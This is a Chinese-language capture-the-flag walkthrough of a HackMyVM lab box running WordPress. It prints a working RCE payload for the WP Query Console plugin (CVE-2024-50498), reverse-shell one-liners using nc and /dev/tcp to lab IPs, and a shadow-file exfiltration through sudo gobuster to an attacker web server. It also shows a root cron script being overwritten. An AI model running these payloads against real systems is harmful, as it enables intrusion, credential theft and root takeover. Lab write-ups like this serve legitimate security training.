HMV Buster

信息收集

我的靶机启动起来名字叫 Listen ，一开始我以为下载错了。

IP=192.168.0.192
nmap $IP -p-

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-05 04:16 EST
Nmap scan report for 192.168.0.192
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

80 一打开，呦呵，这不是 bamuwe 的博客吗哈哈。网页的 footer 里面明晃晃的写着 WordPress .
那必须 WPScan 一波。

wpscan --api-token $WPSCAN_API_TOKEN --url http://192.168.0.192 --plugins-detection aggressive -e u,ap

+] wp-query-console
 | Location: http://192.168.0.192/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.0.192/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.0.192/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.0.192/wp-content/plugins/wp-query-console/README.txt

找到一个插件漏洞 wp-query-console 中的 CVE-2024-50498 WP Query Console <= 1.0 - Unauthenticated Remote Code Execution

看到了一个 Github 上的 POC
看了下是非常简单的，只要请求 /wp-json/wqc/v1/query 带上JSON参数： {"queryArgs":"phpinfo();","queryType":"post"} 就可以执行命令了。

curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"phpinfo();","queryType":"post"}'

就返回了 phpinfo() 的内容了。

尝试渗透

找一个php的反弹试试看.

curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"system(\"bash -i >& /dev/tcp/192.168.0.100/1234 0>&1\");","queryType":"post"}'
{"status":"error","data":"null","message":"Query args invalid"}    

试了几个都显示 Query args invalid ，可能有过滤,翻了一下刚才的phpinfo:

disable_functions

passthru,exec,system,popen,chroot,scandir,chgrp,chown,escapesh

函数你禁得了，反引号能用不，试了下：

curl -X POST http://192.168.0.192/wp-json/wqc/v1/query -H "Content-Type: application/json" -d '{"queryArgs":"`nc -e /bin/bash 192.168.0.30 1234`;","queryType":"post"}'

龟龟，真连上了 ：

(remote) www-data@listen:/var/www/html/wordpress$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

(remote) www-data@listen:/var/www/html/wordpress$ cat /etc/passwd
welcome:x:1001:1001::/home/welcome:/bin/sh

(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php

define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

哈哈，ll104567 这个id 是真熟悉 。

渗透

连上数据库

(remote) www-data@listen:/var/www/html/wordpress$ mysql -u ll104567 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 109290
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables; 
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.001 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url              | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | ta0        | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0           | [email protected] | http://192.168.31.181 | 2025-01-08 03:10:43 |                                               |           0 | ta0          |
|  2 | welcome    | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome       | [email protected]  |                       | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. |           0 | welcome      |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)

MariaDB [wordpress]> 

john 一下 welcome 和 ta0 的密码：

104567           (?)    

welcome 密码是 104567

ta0 的密码整了半天，没有跑出来，暂时放弃。

ssh 试下 welcome ：

ssh [email protected]

$ id 
uid=1001(welcome) gid=1001(welcome) groups=1001(welcome)

提权

成功拿到 welcome 的权限，看怎么提权。

welcome@listen:~$ sudo -l;

Matching Defaults entries for welcome on listen:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User welcome may run the following commands on listen:

    (ALL) NOPASSWD: /usr/bin/gobuster

咋是个 gobuster, 第一个反应就是把 flag 给带到字典上，通过 http 带出来。

sudo gobuster -u http://192.168.0.30:8000 -w /root/root.txt

好家伙，文件不存在。那去拿 shadow ?

sudo gobuster -u http://192.168.0.30:8000 -w /etc/shadow

192.168.0.192 - - [05/Feb/2025 22:30:08] code 404, message File not found
192.168.0.192 - - [05/Feb/2025 22:30:08] "GET /root:$6$uvmZZfH41v4CKcWZ$kAglkiLVm6RQYjB/9wZ8GgmbJQqT8QZazoC7hz27tArTJkp7wQZ..0jAnw3BEge9aeN6614uoDeRn5aHvVqc10:20096:0:99999:7::: HTTP/1.1" 404 -

看到 root 的 shadow 了,跑一下：

john --wordlist=/usr/share/wordlists/rockyou.txt ./root

跑了一中午没出来，得换个思路.

还有个写文件，随便造点数据，试试看输出的格式：

sudo gobuster -u http://192.168.0.30:8000 -w a.txt  -n  -o passwd.txt 

/hash
/root

加一个 -n 可以不显示 status code，输出的文件就干净一些。暂时没想到有啥用。
突然想到这个问题 ll104567 问过我 哈哈哈。

看来还是有我没有想到的点。上 pspy 看看：

/bin/sh -c /bin/bash /opt/.test.sh

还真是有东西,学坏了,用上 opt 了。直接cat 没有权限。不慌我们用 gobuster 带出来。

sudo gobuster -u http://192.168.0.30:8000 -w /opt/.test.sh

192.168.0.192 - - [05/Feb/2025 23:33:29] "GET /echo%20test HTTP/1.1" 404 -

第一反应这是个啥玩意啊。然后就想起来了，这就是给留的一手被，往里写就完了：

# 先弄一个反弹的脚本放到 /tmp/run.sh 里
echo 'nc -e /bin/bash 192.168.0.30 1234' > /tmp/run.sh
# 给个权限
chmod +x /tmp/run.sh

# 然后 写 tmp/run.sh 到 a.txt里 ，开头的/ 不用要了 
echo 'tmp/run.sh' > a.txt

kali 里面准备下 tmp/run.sh 这个文件

mkdir tmp
cd tmp
echo ''>run.sh
cd ..
python -m http.server

然后写进去等执行：

sudo gobuster -u http://192.168.0.30:8000 -w a.txt -n -o /opt/.test.sh

等到反弹回来，就可以拿到 root 了。

(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@listen:/root# ls
note.txt  R00t_fl4g_is_HHHHerererererrererere.tx

果然这名字我猜不到，哈哈。